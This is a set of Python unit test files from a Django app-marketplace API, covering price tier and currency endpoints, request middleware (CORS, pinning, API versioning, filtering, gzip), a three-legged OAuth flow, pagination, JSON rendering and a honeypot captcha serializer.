AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
res = self.client.post(self.url)
eq_(res.status_code, 204)
assert fetch.called
assert not validator.called
def test_no_packaged(self, validator, fetch):
AddonUser.objects.create(addon_id=337141, user_id=self.user.pk)
Webapp.objects.filter(pk=337141).update(is_packaged=True)
res = self.client.post(self.url)
eq_(res.status_code, 400)
eq_(res.json, {'reason': 'App is a packaged app.'})
class TestPriceTier(RestOAuth):
fixtures = ['data/user_2519', 'data/admin'] + fixture('prices2')
def setUp(self):
self.permission = 'Prices:Edit'
RestOAuth.setUp(self)
self.list_url = reverse('price-tier-list')
self.detail_url = reverse('price-tier-detail', kwargs={'pk': 1})
def test_list(self):
self.grant_permission(self.profile, self.permission)
res = self.client.get(self.list_url)
j = json.loads(res.content)
eq_(len(j['objects']), 2)
eq_(j['objects'][0], {
'active': True,
'name': '1',
'price': '0.99',
'method': 'operator+card',
'resource_uri': self.detail_url
})
def test_detail(self):
self.grant_permission(self.profile, self.permission)
res = self.client.get(self.detail_url)
j = json.loads(res.content)
eq_(j, {
'active': True,
'name': '1',
'price': '0.99',
'method': 'operator+card',
'resource_uri': self.detail_url
})
def test_post_unauthorized(self):
res = self.client.post(self.list_url, '{}')
eq_(res.status_code, 403)
def test_post_admin(self):
self.grant_permission(self.profile, self.permission)
res = self.client.post(
self.list_url,
json.dumps({'name': '3',
'price': '3.14',
'method': 'operator+card',
'active': True}))
eq_(res.status_code, 201)
p = Price.objects.get(pk=3)
eq_(p.name, '3')
eq_(p.price, Decimal('3.14'))
eq_(p.method, amo.PAYMENT_METHOD_ALL)
assert p.active
def test_put_unauthorized(self):
res = self.client.put(self.detail_url, '{}')
eq_(res.status_code, 403)
def test_put(self):
self.grant_permission(self.profile, self.permission)
res = self.client.put(
self.detail_url,
json.dumps({'name': '1',
'price': '0.10',
'method': 'operator',
'active': True}))
eq_(res.status_code, 200)
p = Price.objects.get(pk=1)
eq_(p.name, '1')
eq_(p.price, Decimal('0.10'))
eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
assert p.active
def test_delete_unauthorized(self):
res = self.client.delete(self.detail_url)
eq_(res.status_code, 403)
def test_delete(self):
self.grant_permission(self.profile, self.permission)
res = self.client.delete(self.detail_url)
eq_(res.status_code, 204)
assert not Price.objects.filter(pk=1).exists()
class TestPriceCurrency(RestOAuth):
fixtures = ['data/user_2519', 'data/admin'] + fixture('prices2')
def setUp(self):
self.permission = 'Prices:Edit'
RestOAuth.setUp(self)
self.list_url = reverse('price-currency-list')
self.detail_url = reverse('price-currency-detail', kwargs={'pk': 1})
self.tier_url = reverse('price-tier-detail', kwargs={'pk': 1})
def test_list(self):
self.grant_permission(self.profile, self.permission)
res = self.client.get(self.list_url)
j = json.loads(res.content)
eq_(len(j['objects']), 8)
eq_(j['objects'][0], {
'carrier': None,
'currency': 'PLN',
'dev': True,
'method': 'operator+card',
'paid': True,
'price': '5.01',
'provider': 'bango',
'region': 'pl',
'resource_uri': self.detail_url,
'tier': self.tier_url})
def test_detail(self):
self.grant_permission(self.profile, self.permission)
res = self.client.get(self.detail_url)
j = json.loads(res.content)
eq_(j, {
'carrier': None,
'currency': 'PLN',
'dev': True,
'method': 'operator+card',
'paid': True,
'price': '5.01',
'provider': 'bango',
'region': 'pl',
'resource_uri': self.detail_url,
'tier': self.tier_url
})
def test_post_unauthorized(self):
res = self.client.post(self.list_url, '{}')
eq_(res.status_code, 403)
def test_post_admin(self):
self.grant_permission(self.profile, self.permission)
res = self.client.post(
self.list_url,
json.dumps({
'tier': self.tier_url,
'carrier': None,
'currency': 'PHP',
'method': 'operator',
'price': '10.05',
'provider': 'bango',
'region': 'pl',
'paid': True,
'dev': True}))
eq_(res.status_code, 201)
# Get the pk from the response.
pk = res.json['resource_uri'].split('/')[-2]
p = PriceCurrency.objects.get(pk=pk)
eq_(p.tier_id, 1)
eq_(p.price, Decimal('10.05'))
eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
eq_(p.currency, 'PHP')
def test_put_unauthorized(self):
res = self.client.put(self.detail_url, '{}')
eq_(res.status_code, 403)
def test_put(self):
self.grant_permission(self.profile, self.permission)
res = self.client.put(
self.detail_url,
json.dumps({
'tier': self.tier_url,
'carrier': None,
'currency': 'USD',
'method': 'operator',
'price': '10.05',
'provider': 'bango',
'region': 'pl',
'paid': True,
'dev': False}))
eq_(res.status_code, 200, res.content)
p = PriceCurrency.objects.get(pk=1)
eq_(p.tier_id, 1)
eq_(p.price, Decimal('10.05'))
eq_(p.method, amo.PAYMENT_METHOD_OPERATOR)
eq_(p.currency, 'USD')
eq_(p.region, 11)
eq_(p.paid, True)
eq_(p.dev, False)
def test_delete_unauthorized(self):
res = self.client.delete(self.detail_url)
eq_(res.status_code, 403)
def test_delete(self):
self.grant_permission(self.profile, self.permission)
res = self.client.delete(self.detail_url)
eq_(res.status_code, 204)
assert not PriceCurrency.objects.filter(pk=1).exists()
class TestLargeTextField(TestCase):
fixtures = fixture('webapp_337141')
def setUp(self):
self.request = Request(RequestFactory().get('/'))
def test_receive(self):
data = 'privacy policy text'
into = {}
field = LargeTextField(view_name='app-privacy-policy-detail')
field.context = {'request': self.request}
field.field_from_native({'field_name': data}, None, 'field_name', into)
eq_(into['field_name'], data)
def test_send(self):
app = Webapp.objects.get(pk=337141)
app.privacy_policy = 'privacy policy text'
field = LargeTextField(view_name='app-privacy-policy-detail')
field.context = {'request': self.request}
url = field.field_to_native(app, None)
self.assertApiUrlEqual(url, '/apps/app/337141/privacy/')
########NEW FILE########
__FILENAME__ = test_middleware
from urlparse import parse_qs
from django.conf import settings
from django.core.cache import cache
from django.http import HttpResponse, HttpResponseServerError
from django.test.utils import override_settings
import mock
from multidb import this_thread_is_pinned
from nose.tools import eq_, ok_
from test_utils import RequestFactory
import amo.tests
from mkt.api.middleware import (APIFilterMiddleware, APIPinningMiddleware,
APITransactionMiddleware, APIVersionMiddleware,
CORSMiddleware, GZipMiddleware)
import mkt.regions
from mkt.site.middleware import RedirectPrefixedURIMiddleware
fireplace_url = 'http://firepla.ce:1234'
class TestCORS(amo.tests.TestCase):
def setUp(self):
self.mware = CORSMiddleware()
self.req = RequestFactory().get('/')
def test_not_cors(self):
res = self.mware.process_response(self.req, HttpResponse())
assert not res.has_header('Access-Control-Allow-Methods')
def test_cors(self):
self.req.CORS = ['get']
res = self.mware.process_response(self.req, HttpResponse())
eq_(res['Access-Control-Allow-Origin'], '*')
eq_(res['Access-Control-Allow-Methods'], 'GET, OPTIONS')
def test_post(self):
self.req.CORS = ['get', 'post']
res = self.mware.process_response(self.req, HttpResponse())
eq_(res['Access-Control-Allow-Methods'], 'GET, POST, OPTIONS')
eq_(res['Access-Control-Allow-Headers'],
'X-HTTP-Method-Override, Content-Type')
@mock.patch.object(settings, 'FIREPLACE_URL', fireplace_url)
def test_from_fireplace(self):
self.req.CORS = ['get']
self.req.META['HTTP_ORIGIN'] = fireplace_url
res = self.mware.process_response(self.req, HttpResponse())
eq_(res['Access-Control-Allow-Origin'], fireplace_url)
eq_(res['Access-Control-Allow-Methods'], 'GET, OPTIONS')
eq_(res['Access-Control-Allow-Credentials'], 'true')
class TestTransactionMiddleware(amo.tests.TestCase):
def setUp(self):
self.prefix = RedirectPrefixedURIMiddleware()
self.transaction = APITransactionMiddleware()
def test_api(self):
req = RequestFactory().get('/api/foo/')
self.prefix.process_request(req)
ok_(req.API)
def test_not_api(self):
req = RequestFactory().get('/not-api/foo/')
self.prefix.process_request(req)
ok_(not req.API)
@mock.patch('django.db.transaction.enter_transaction_management')
def test_transactions(self, enter):
req = RequestFactory().get('/api/foo/')
self.prefix.process_request(req)
self.transaction.process_request(req)
ok_(enter.called)
@mock.patch('django.db.transaction.enter_transaction_management')
def test_not_transactions(self, enter):
req = RequestFactory().get('/not-api/foo/')
self.prefix.process_request(req)
self.transaction.process_request(req)
ok_(not enter.called)
class TestPinningMiddleware(amo.tests.TestCase):
def setUp(self):
self.pin = APIPinningMiddleware()
self.req = RequestFactory().get('/')
self.req.API = True
self.key = 'api-pinning:42'
def attach_user(self, anon=True):
self.req.user = mock.Mock(id=42, is_anonymous=lambda: anon)
def test_pinned_request_method(self):
self.attach_user(anon=False)
for method in ['DELETE', 'PATCH', 'POST', 'PUT']:
self.req.method = method
self.pin.process_request(self.req)
ok_(this_thread_is_pinned())
for method in ['GET', 'HEAD', 'OPTIONS', 'POOP']:
self.req.method = method
self.pin.process_request(self.req)
ok_(not this_thread_is_pinned())
def test_pinned_cached(self):
cache.set(self.key, 1, 5)
self.attach_user(anon=False)
self.pin.process_request(self.req)
ok_(this_thread_is_pinned())
cache.delete(self.key)
def test_not_pinned(self):
self.attach_user(anon=True)
self.pin.process_request(self.req)
ok_(not this_thread_is_pinned())
def test_process_response_anon(self):
self.attach_user(anon=True)
self.req.method = 'POST'
self.pin.process_response(self.req, HttpResponse())
ok_(not cache.get(self.key))
def test_process_response(self):
self.attach_user(anon=False)
for method in ['DELETE', 'PATCH', 'POST', 'PUT']:
self.req.method = method
self.pin.process_response(self.req, HttpResponse())
ok_(cache.get(self.key))
cache.delete(self.key)
for method in ['GET', 'HEAD', 'OPTIONS', 'POOP']:
self.req.method = method
self.pin.process_response(self.req, HttpResponse())
ok_(not cache.get(self.key))
def pinned_header(self):
self.attach_user(anon=True)
return self.pin.process_response(self.req, HttpResponse())['API-Pinned']
@mock.patch('mkt.api.middleware.this_thread_is_pinned')
def test_pinned_header_true(self, mock_pinned):
mock_pinned.return_value = True
eq_(self.pinned_header(), 'True')
@mock.patch('mkt.api.middleware.this_thread_is_pinned')
def test_pinned_header_false(self, mock_pinned):
mock_pinned.return_value = False
eq_(self.pinned_header(), 'False')
@override_settings(API_CURRENT_VERSION=2)
class TestAPIVersionMiddleware(amo.tests.TestCase):
def setUp(self):
self.api_version_middleware = APIVersionMiddleware()
self.prefix_middleware = RedirectPrefixedURIMiddleware()
def response(self, url):
req = RequestFactory().get(url)
self.prefix_middleware.process_request(req)
resp = self.api_version_middleware.process_request(req)
if resp:
return resp
return self.api_version_middleware.process_response(req, HttpResponse())
def header(self, res, header):
return res.get(header, None)
def test_non_api(self):
res1 = self.response('/foo/')
eq_(self.header(res1, 'API-Version'), None)
eq_(self.header(res1, 'API-Status'), None)
res2 = self.response('/foo/')
eq_(self.header(res2, 'API-Version'), None)
eq_(self.header(res2, 'API-Status'), None)
def test_version_not_specified(self):
res = self.response('/api/')
eq_(self.header(res, 'API-Version'), '1')
eq_(self.header(res, 'API-Status'), 'Deprecated')
def test_old_version(self):
res = self.response('/api/v1/')
eq_(self.header(res, 'API-Version'), '1')
eq_(self.header(res, 'API-Status'), 'Deprecated')
def test_current_version(self):
res = self.response('/api/v2/')
eq_(self.header(res, 'API-Version'), '2')
eq_(self.header(res, 'API-Status'), None)
def test_future_version(self):
res = self.response('/api/v3/')
eq_(self.header(res, 'API-Version'), '3')
eq_(self.header(res, 'API-Status'), None)
def test_no_api_version(self):
req = RequestFactory().get('/api/v2/')
req.API = True
res = self.api_version_middleware.process_response(req, HttpResponse())
eq_(self.header(res, 'API-Version'), '2')
eq_(self.header(res, 'API-Status'), None)
class TestFilterMiddleware(amo.tests.TestCase):
def setUp(self):
self.middleware = APIFilterMiddleware()
self.factory = RequestFactory()
def _header(self, url='/', api=True, region=mkt.regions.US, lang='en-US',
gaia=True, tablet=True, mobile=True, pro='8a7d546c.32.1',
response_cls=HttpResponse):
self.request = self.factory.get(url, {'pro': pro})
self.request.API = api
self.request.REGION = region
self.request.LANG = lang or ''
self.request.GAIA = gaia
self.request.TABLET = tablet
self.request.MOBILE = mobile
res = self.middleware.process_response(self.request, response_cls())
if api and response_cls.status_code < 500:
header = res.get('API-Filter')
assert 'vary' in res._headers
eq_(res._headers['vary'][1], 'API-Filter')
self._test_order(header)
return parse_qs(header)
else:
assert 'vary' not in res._headers
return None
def _test_order(self, header):
order = [item.split('=')[0] for item in header.split('&')]
eq_(order, sorted(order))
@mock.patch('mkt.api.middleware.get_carrier')
def test_success(self, gc):
carrier = 'telerizon'
gc.return_value = carrier
header = self._header()
self.assertIsInstance(header, dict)
assert mkt.regions.US.slug in header['region']
assert 'en-US' in header['lang']
assert '8a7d546c.32.1' in header['pro']
assert carrier in header['carrier']
self.assertSetEqual(['gaia', 'mobile', 'tablet'], header['device'])
def test_api_false(self):
header = self._header(api=False)
eq_(header, None)
def test_no_devices(self):
header = self._header(gaia=False, tablet=False, mobile=False)
assert 'device' not in header
def test_one_device(self):
header = self._header(gaia=True, tablet=False, mobile=False)
self.assertSetEqual(['gaia'], header['device'])
@mock.patch('mkt.api.middleware.get_carrier')
def test_no_carrier(self, gc):
gc.return_value = None
header = self._header()
assert 'carrier' not in header
def test_region(self):
region = mkt.regions.BR
header = self._header(region=region)
assert region.slug in header['region']
def test_no_region(self):
with self.assertRaises(AttributeError):
self._header(region=None)
def test_lang(self):
lang = 'pt-BR'
header = self._header(lang=lang)
assert lang in header['lang']
def test_no_lang(self):
header = self._header(lang=None)
assert 'lang' not in header
def test_500(self):
self._header(response_cls=HttpResponseServerError)
class TestGzipMiddleware(amo.tests.TestCase):
@mock.patch('django.middleware.gzip.GZipMiddleware.process_response')
def test_enabled_for_api(self, django_gzip_middleware):
request = mock.Mock()
request.API = True
GZipMiddleware().process_response(request, mock.Mock())
ok_(django_gzip_middleware.called)
@mock.patch('django.middleware.gzip.GZipMiddleware.process_response')
def test_disabled_for_the_rest(self, django_gzip_middleware):
request = mock.Mock()
request.API = False
GZipMiddleware().process_response(request, mock.Mock())
ok_(not django_gzip_middleware.called)
def test_settings(self):
# Gzip middleware should be at the top of the list, so that it runs
# last in the process_response phase, in case the body has been
# modified by another middleware.
eq_(settings.MIDDLEWARE_CLASSES[0],
'mkt.api.middleware.GZipMiddleware')
########NEW FILE########
__FILENAME__ = test_oauth
import json
import urllib
import urlparse
from datetime import datetime
from functools import partial
from django.conf import settings
from django.core.urlresolvers import reverse
from django.test.client import Client, FakePayload
from django.utils.encoding import iri_to_uri, smart_str
from django_browserid.tests import mock_browserid
from nose.tools import eq_
from oauthlib import oauth1
from pyquery import PyQuery as pq
from rest_framework.request import Request
from test_utils import RequestFactory
from amo.helpers import absolutify, urlparams
from amo.tests import TestCase
from mkt.api import authentication
from mkt.api.middleware import RestOAuthMiddleware
from mkt.api.models import Access, ACCESS_TOKEN, generate, REQUEST_TOKEN, Token
from mkt.api.tests import BaseAPI
from mkt.site.fixtures import fixture
from users.models import UserProfile
def get_absolute_url(url, api_name='apps', absolute=True):
# Gets an absolute url, except where you don't want that.
url[1]['api_name'] = api_name
res = reverse(url[0], kwargs=url[1])
if absolute:
res = urlparse.urljoin(settings.SITE_URL, res)
if len(url) > 2:
res = urlparams(res, **url[2])
return res
def wrap(response):
"""Wrapper around responses to add additional info."""
def _json(self):
"""Will return parsed JSON on response if there is any."""
if self.content and 'application/json' in self['Content-Type']:
if not hasattr(self, '_content_json'):
self._content_json = json.loads(self.content)
return self._content_json
if not hasattr(response.__class__, 'json'):
response.__class__.json = property(_json)
return response
class OAuthClient(Client):
"""
OAuthClient can do all the requests the Django test client,
but even more. And it can magically sign requests.
TODO (andym): this could be cleaned up and split out, it's useful.
"""
signature_method = oauth1.SIGNATURE_HMAC
def __init__(self, access, api_name='apps'):
super(OAuthClient, self).__init__(self)
self.access = access
self.get_absolute_url = partial(get_absolute_url,
api_name=api_name)
def login(self, username, password):
with mock_browserid(email=username):
return super(OAuthClient, self).login(username=username,
password=password)
def sign(self, method, url):
if not self.access:
return url, {}, ''
cl = oauth1.Client(self.access.key,
client_secret=self.access.secret,
signature_method=self.signature_method)
url, headers, body = cl.sign(url, http_method=method)
# We give cl.sign a str, but it gives us back a unicode, which cause
# double-encoding problems later down the road with the django test
# client. To fix that, ensure it's still an str after signing.
return smart_str(url), headers, body
def kw(self, headers, **kw):
kw.setdefault('HTTP_HOST', 'testserver')
kw.setdefault('HTTP_AUTHORIZATION', headers.get('Authorization', ''))
return kw
def get(self, url, data={}, **kw):
if isinstance(url, tuple) and len(url) > 2 and data:
raise RuntimeError('Query string specified both in urlspec and as '
'data arg. Pick one or the other.')
urlstring = self.get_absolute_url(url)
if data:
urlstring = '?'.join([urlstring,
urllib.urlencode(data, doseq=True)])
url, headers, _ = self.sign('GET', urlstring)
return wrap(super(OAuthClient, self)
.get(url, **self.kw(headers, **kw)))
def delete(self, url, data={}, **kw):
if isinstance(url, tuple) and len(url) > 2 and data:
raise RuntimeError('Query string specified both in urlspec and as '
'data arg. Pick one or the other.')
urlstring = self.get_absolute_url(url)
if data:
urlstring = '?'.join([urlstring,
urllib.urlencode(data, doseq=True)])
url, headers, _ = self.sign('DELETE', urlstring)
return wrap(super(OAuthClient, self)
.delete(url, **self.kw(headers, **kw)))
def post(self, url, data='', content_type='application/json', **kw):
url, headers, _ = self.sign('POST', self.get_absolute_url(url))
return wrap(super(OAuthClient, self).post(url, data=data,
content_type=content_type,
**self.kw(headers, **kw)))
def put(self, url, data='', content_type='application/json', **kw):
url, headers, body = self.sign('PUT', self.get_absolute_url(url))
return wrap(super(OAuthClient, self).put(url, data=data,
content_type=content_type,
**self.kw(headers, **kw)))
def patch(self, url, data='', **kw):
url, headers, body = self.sign('PATCH', self.get_absolute_url(url))
parsed = urlparse.urlparse(url)
kw.update(**self.kw(headers, **{
'CONTENT_LENGTH': len(data),
'CONTENT_TYPE': 'application/json',
'PATH_INFO': urllib.unquote(parsed[2]),
'REQUEST_METHOD': 'PATCH',
'wsgi.input': FakePayload(data),
}))
response = self.request(**kw)
return response
def options(self, url):
url, headers, body = self.sign('OPTIONS', self.get_absolute_url(url))
return wrap(super(OAuthClient, self).options(url, **self.kw(headers)))
class BaseOAuth(BaseAPI):
fixtures = fixture('user_2519', 'group_admin', 'group_editor',
'group_support')
def setUp(self, api_name='apps'):
self.profile = self.user = UserProfile.objects.get(pk=2519)
self.profile.update(read_dev_agreement=datetime.now())
self.access = Access.objects.create(key='oauthClientKeyForTests',
secret=generate(),
user=self.user)
self.client = OAuthClient(self.access, api_name=api_name)
self.anon = OAuthClient(None, api_name=api_name)
class RestOAuthClient(OAuthClient):
def __init__(self, access):
super(OAuthClient, self).__init__(self)
self.access = access
def get_absolute_url(self, url):
unquoted_url = urlparse.unquote(url)
return absolutify(iri_to_uri(unquoted_url))
class RestOAuth(BaseOAuth):
fixtures = fixture('user_2519')
def setUp(self):
self.profile = self.user = UserProfile.objects.get(pk=2519)
self.profile.update(read_dev_agreement=datetime.now())
self.access = Access.objects.create(key='oauthClientKeyForTests',
secret=generate(),
user=self.user)
self.client = RestOAuthClient(self.access)
self.anon = RestOAuthClient(None)
class Test3LeggedOAuthFlow(TestCase):
fixtures = fixture('user_2519', 'user_999')
def setUp(self, api_name='apps'):
self.profile = self.user = UserProfile.objects.get(pk=2519)
self.user2 = UserProfile.objects.get(pk=999)
self.profile.update(read_dev_agreement=datetime.now())
self.app_name = 'Mkt Test App'
self.redirect_uri = 'https://example.com/redirect_target'
self.access = Access.objects.create(key='oauthClientKeyForTests',
secret=generate(),
user=self.user,
redirect_uri=self.redirect_uri,
app_name=self.app_name)
def _oauth_request_info(self, url, **kw):
oa = oauth1.Client(signature_method=oauth1.SIGNATURE_HMAC, **kw)
url, headers, _ = oa.sign(url, http_method='GET')
return url, headers['Authorization']
def test_use_access_token(self):
url = absolutify(reverse('app-list'))
t = Token.generate_new(ACCESS_TOKEN, creds=self.access,
user=self.user2)
url, auth_header = self._oauth_request_info(
url, client_key=self.access.key, client_secret=self.access.secret,
resource_owner_key=t.key, resource_owner_secret=t.secret)
auth = authentication.RestOAuthAuthentication()
req = RequestFactory().get(
url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
req.API = True
RestOAuthMiddleware().process_request(req)
assert auth.authenticate(Request(req))
eq_(req.user, self.user2)
def test_bad_access_token(self):
url = absolutify(reverse('app-list'))
Token.generate_new(ACCESS_TOKEN, creds=self.access, user=self.user2)
url, auth_header = self._oauth_request_info(
url, client_key=self.access.key,
client_secret=self.access.secret, resource_owner_key=generate(),
resource_owner_secret=generate())
auth = authentication.RestOAuthAuthentication()
req = RequestFactory().get(
url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
req.API = True
RestOAuthMiddleware().process_request(req)
assert not auth.authenticate(Request(req))
def test_get_authorize_page(self):
t = Token.generate_new(REQUEST_TOKEN, self.access)
self.client.login(username='[email protected]', password='password')
res = self.client.get('/oauth/authorize/', data={'oauth_token': t.key})
eq_(res.status_code, 200)
page = pq(res.content)
eq_(page('input[name=oauth_token]').attr('value'), t.key)
def test_get_authorize_page_bad_token(self):
self.client.login(username='[email protected]', password='password')
res = self.client.get('/oauth/authorize/',
data={'oauth_token': 'bad_token_value'})
eq_(res.status_code, 401)
def test_post_authorize_page(self):
t = Token.generate_new(REQUEST_TOKEN, self.access)
full_redirect = (
self.redirect_uri + '?oauth_token=%s&oauth_verifier=%s'
% (t.key, t.verifier))
self.client.login(username='[email protected]', password='password')
url = reverse('mkt.developers.oauth_authorize')
res = self.client.post(url, data={'oauth_token': t.key, 'grant': ''})
eq_(res.status_code, 302)
eq_(res.get('location'), full_redirect)
eq_(Token.objects.get(pk=t.pk).user.pk, 999)
def test_access_request(self):
t = Token.generate_new(REQUEST_TOKEN, self.access)
url = urlparse.urljoin(settings.SITE_URL,
reverse('mkt.developers.oauth_access_request'))
url, auth_header = self._oauth_request_info(
url, client_key=self.access.key, client_secret=self.access.secret,
resource_owner_key=t.key, resource_owner_secret=t.secret,
verifier=t.verifier, callback_uri=self.access.redirect_uri)
res = self.client.get(url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
eq_(res.status_code, 200)
data = dict(urlparse.parse_qsl(res.content))
assert Token.objects.filter(
token_type=ACCESS_TOKEN,
key=data['oauth_token'],
secret=data['oauth_token_secret'],
user=t.user,
creds=self.access).exists()
assert not Token.objects.filter(
token_type=REQUEST_TOKEN,
key=t.key).exists()
def test_bad_access_request(self):
t = Token.generate_new(REQUEST_TOKEN, self.access)
url = urlparse.urljoin(settings.SITE_URL,
reverse('mkt.developers.oauth_access_request'))
url, auth_header = self._oauth_request_info(
url, client_key=t.key, client_secret=t.secret,
resource_owner_key=generate(), resource_owner_secret=generate(),
verifier=generate(), callback_uri=self.access.redirect_uri)
res = self.client.get(url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
eq_(res.status_code, 401)
assert not Token.objects.filter(token_type=ACCESS_TOKEN).exists()
def test_token_request(self):
url = urlparse.urljoin(settings.SITE_URL,
reverse('mkt.developers.oauth_token_request'))
url, auth_header = self._oauth_request_info(
url, client_key=self.access.key, client_secret=self.access.secret,
callback_uri=self.access.redirect_uri)
res = self.client.get(url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
eq_(res.status_code, 200)
data = dict(urlparse.parse_qsl(res.content))
assert Token.objects.filter(
token_type=REQUEST_TOKEN,
key=data['oauth_token'],
secret=data['oauth_token_secret'],
creds=self.access).exists()
def test_bad_token_request(self):
url = urlparse.urljoin(settings.SITE_URL,
reverse('mkt.developers.oauth_token_request'))
url, auth_header = self._oauth_request_info(
url, client_key=self.access.key, client_secret=generate(),
callback_uri=self.access.redirect_uri)
res = self.client.get(url, HTTP_HOST='testserver',
HTTP_AUTHORIZATION=auth_header)
eq_(res.status_code, 401)
assert not Token.objects.filter(token_type=REQUEST_TOKEN).exists()
########NEW FILE########
__FILENAME__ = test_paginator
from urlparse import urlparse
from django.core.paginator import Paginator
from django.http import QueryDict
import mock
from elasticutils.contrib.django import S
from nose.tools import eq_
from test_utils import RequestFactory
from amo.tests import TestCase
from mkt.api.paginator import MetaSerializer, ESPaginator
from mkt.webapps.models import WebappIndexer
class TestSearchPaginator(TestCase):
@mock.patch('pyelasticsearch.client.ElasticSearch.send_request')
def test_single_hit(self, _mock):
"""Test the ES paginator only queries ES one time."""
ESPaginator(S(WebappIndexer), 5).object_list.execute()
eq_(_mock.call_count, 1)
class TestMetaSerializer(TestCase):
def setUp(self):
self.url = '/api/whatever'
self.request = RequestFactory().get(self.url)
def get_serialized_data(self, page):
return MetaSerializer(page, context={'request': self.request}).data
def test_simple(self):
data = ['a', 'b', 'c']
per_page = 3
page = Paginator(data, per_page).page(1)
serialized = self.get_serialized_data(page)
eq_(serialized['offset'], 0)
eq_(serialized['next'], None)
eq_(serialized['previous'], None)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
def test_first_page_of_two(self):
data = ['a', 'b', 'c', 'd', 'e']
per_page = 3
page = Paginator(data, per_page).page(1)
serialized = self.get_serialized_data(page)
eq_(serialized['offset'], 0)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
eq_(serialized['previous'], None)
next = urlparse(serialized['next'])
eq_(next.path, self.url)
eq_(QueryDict(next.query), QueryDict('limit=3&offset=3'))
def test_third_page_of_four(self):
data = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
per_page = 2
page = Paginator(data, per_page).page(3)
serialized = self.get_serialized_data(page)
# Third page will begin after fourth item
# (per_page * number of pages before) item.
eq_(serialized['offset'], 4)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
prev = urlparse(serialized['previous'])
eq_(prev.path, self.url)
eq_(QueryDict(prev.query), QueryDict('limit=2&offset=2'))
next = urlparse(serialized['next'])
eq_(next.path, self.url)
eq_(QueryDict(next.query), QueryDict('limit=2&offset=6'))
def test_fourth_page_of_four(self):
data = ['a', 'b', 'c', 'd', 'e', 'f', 'g']
per_page = 2
page = Paginator(data, per_page).page(4)
serialized = self.get_serialized_data(page)
# Third page will begin after fourth item
# (per_page * number of pages before) item.
eq_(serialized['offset'], 6)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
prev = urlparse(serialized['previous'])
eq_(prev.path, self.url)
eq_(QueryDict(prev.query), QueryDict('limit=2&offset=4'))
eq_(serialized['next'], None)
def test_without_request_path(self):
data = ['a', 'b', 'c', 'd', 'e']
per_page = 2
page = Paginator(data, per_page).page(2)
serialized = MetaSerializer(page).data
eq_(serialized['offset'], 2)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
prev = urlparse(serialized['previous'])
eq_(prev.path, '')
eq_(QueryDict(prev.query), QueryDict('limit=2&offset=0'))
next = urlparse(serialized['next'])
eq_(next.path, '')
eq_(QueryDict(next.query), QueryDict('limit=2&offset=4'))
def test_with_request_path_override_existing_params(self):
self.url = '/api/whatever/?limit=0&offset=xxx&extra&superfluous=yes'
self.request = RequestFactory().get(self.url)
data = ['a', 'b', 'c', 'd', 'e', 'f']
per_page = 2
page = Paginator(data, per_page).page(2)
serialized = self.get_serialized_data(page)
eq_(serialized['offset'], 2)
eq_(serialized['total_count'], len(data))
eq_(serialized['limit'], per_page)
prev = urlparse(serialized['previous'])
eq_(prev.path, '/api/whatever/')
eq_(QueryDict(prev.query),
QueryDict('limit=2&offset=0&extra=&superfluous=yes'))
next = urlparse(serialized['next'])
eq_(next.path, '/api/whatever/')
eq_(QueryDict(next.query),
QueryDict('limit=2&offset=4&extra=&superfluous=yes'))
########NEW FILE########
__FILENAME__ = test_renderers
from nose.tools import eq_
from amo.tests import TestCase
from mkt.api.renderers import SuccinctJSONRenderer
class TestSuccinctJSONRenderer(TestCase):
def setUp(self):
self.renderer = SuccinctJSONRenderer()
self.input = {'foo': 'bar'}
def test_no_spaces(self):
output = self.renderer.render(self.input)
eq_(output, '{"foo":"bar"}')
def test_indent_context(self):
output = self.renderer.render(self.input,
renderer_context={'indent': 4})
eq_(output, '{\n "foo": "bar"\n}')
def test_accepted_header(self):
header = 'application/json; indent=4'
output = self.renderer.render(self.input, accepted_media_type=header)
eq_(output, '{\n "foo": "bar"\n}')
########NEW FILE########
__FILENAME__ = test_serializer
# -*- coding: utf-8 -*-
from decimal import Decimal
import json
from django.core.handlers.wsgi import WSGIRequest
from django.test import TestCase
from django.utils.http import urlencode
import mock
from nose.tools import eq_, ok_
from rest_framework.serializers import Serializer, ValidationError
from simplejson import JSONDecodeError
from test_utils import RequestFactory
from users.models import UserProfile
from mkt.api.serializers import PotatoCaptchaSerializer, URLSerializerMixin
from mkt.site.fixtures import fixture
from mkt.site.tests.test_forms import PotatoCaptchaTestCase
class TestPotatoCaptchaSerializer(PotatoCaptchaTestCase):
fixtures = fixture('user_999')
def test_success_authenticated(self):
self.request.user = UserProfile.objects.get(id=999)
self.request.user.is_authenticated = lambda: True
serializer = PotatoCaptchaSerializer(data={}, context=self.context)
eq_(serializer.is_valid(), True)
def test_success_anonymous(self):
data = {'tuber': '', 'sprout': 'potato'}
serializer = PotatoCaptchaSerializer(data=data, context=self.context)
eq_(serializer.is_valid(), True)
def test_no_context(self):
data = {'tuber': '', 'sprout': 'potato'}
with self.assertRaises(ValidationError):
PotatoCaptchaSerializer(data=data)
def test_error_anonymous_bad_tuber(self):
data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': 'potato'}
serializer = PotatoCaptchaSerializer(data=data, context=self.context)
eq_(serializer.is_valid(), False)
def test_error_anonymous_bad_sprout(self):
data = {'tuber': 'HAMMMMMMMMMMMMM', 'sprout': ''}
serializer = PotatoCaptchaSerializer(data=data, context=self.context)
eq_(serializer.is_valid(), False)
def test_error_anonymous_bad_tuber_and_sprout(self):
serializer = PotatoCaptchaSerializer(data={}, context=self.context)
eq_(serializer.is_valid(), False)
class TestURLSerializerMixin(TestCase):
SerializerClass = type('Potato', (URLSerializerMixin, Serializer),
{'Meta': None})
Struct = type('Struct', (object,), {})
url_basename = 'potato'
def setUp(self):
self.SerializerClass.Meta = type('Meta', (self.Struct,),
{'model': UserProfile,
'url_basename': self.url_basename})
